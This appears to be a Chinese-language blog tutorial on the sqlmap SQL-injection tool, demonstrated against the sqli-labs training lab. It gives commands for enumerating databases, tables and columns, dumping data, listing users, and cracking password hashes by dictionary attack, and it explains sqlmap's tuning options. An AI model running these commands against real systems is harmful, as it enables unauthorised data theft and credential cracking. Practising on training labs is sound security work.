-
查询数据库
- 查询所有数据库
sqlmap -u http://sqli-labs/Less-1/?id=1 --dbs
- 查询当前网址的数据库
sqlmap -u http://sqli-labs/Less-1/?id=1 --current-db
- 查询所有数据库
-
获取数据库中的表名
sqlmap -u http://sqli-labs/Less-1/?id=1 -D sys --tables
-
获取表中的字段名
sqlmap -u http://sqli-labs/Less-1/?id=1 -D sys -T host_summary --columns
-
获取字段内容
sqlmap -u http://sqli-labs/Less-1/?id=1 -D sys -T host_summary -C host,statements -dump
-
获取数据库的用户
- 获取数据库的所有用户
前提:当前用户有权限读取包含所有用户的表的权限。
sqlmap -u http://sqli-labs/Less-1/?id=1 --users
- 获取当前网址的数据库的用户
sqlmap -u http://sqli-labs/Less-1/?id=1 --current-user
- 获取数据库的所有用户
-
获取数据库用户的密码
sqlmap -u http://sqli-labs/Less-1/?id=1 --passwords
这里出现了几个选项。
第一个意为是否将哈希存储到临时文件,以便最终使用其他根据进行进一步处理。
第二个意为是否要对检索到的密码哈希执行基于字典的攻击。
第三处是选择用哪本字典:- 自带的字典(点击回车即可)
- 自定义字典
- 包含字典文件列表的文件
第四处意为是否使用通用密码后缀。
一直回车下去,最终会选择自带的字典。
7 参数
--level=LEVEL
要执行的测试级别(1-5,默认值1)
--risk=RISK
要执行的测试风险级别(1-3,默认值1)
–batch
使用–batch参数,可以在所有需要用户输入的部分(通常是询问执行yes还是no),执行默认操作,不需要用户再输入
–technique
使用–technique参数可用于指定要测试的SQL注入类型
B:基于布尔的盲注
E:基于错误
U:基于联合查询
S:堆叠查询
T:基于时间的盲注
Q:内联查询
sqlmap设置持久HTTP连接
sqlmap中可以设置连接为持久连接。HTTP报文中设置connection:keep-alive
-- keep-alive
需要注意的是该参数与代理的设置–proxy是相冲突的不能一起使用
sqlmap设置不接收HTTP Body
参数
--null-connection
sqlmap中设置空连接,表示不接受HTTP当中的Body。可以直接获得HTTP响应的大小而不用获得HTTP响应体,常用在盲注过程中
sqlmap设置多线程
参数
--thread
sqlmap中设置同时发送多少个HTTP请求的多线程
一键优化
-o 添加此参数相当于同时添加下列三个优化参数
--keep-alive
--null-connection
--threads=3
发表评论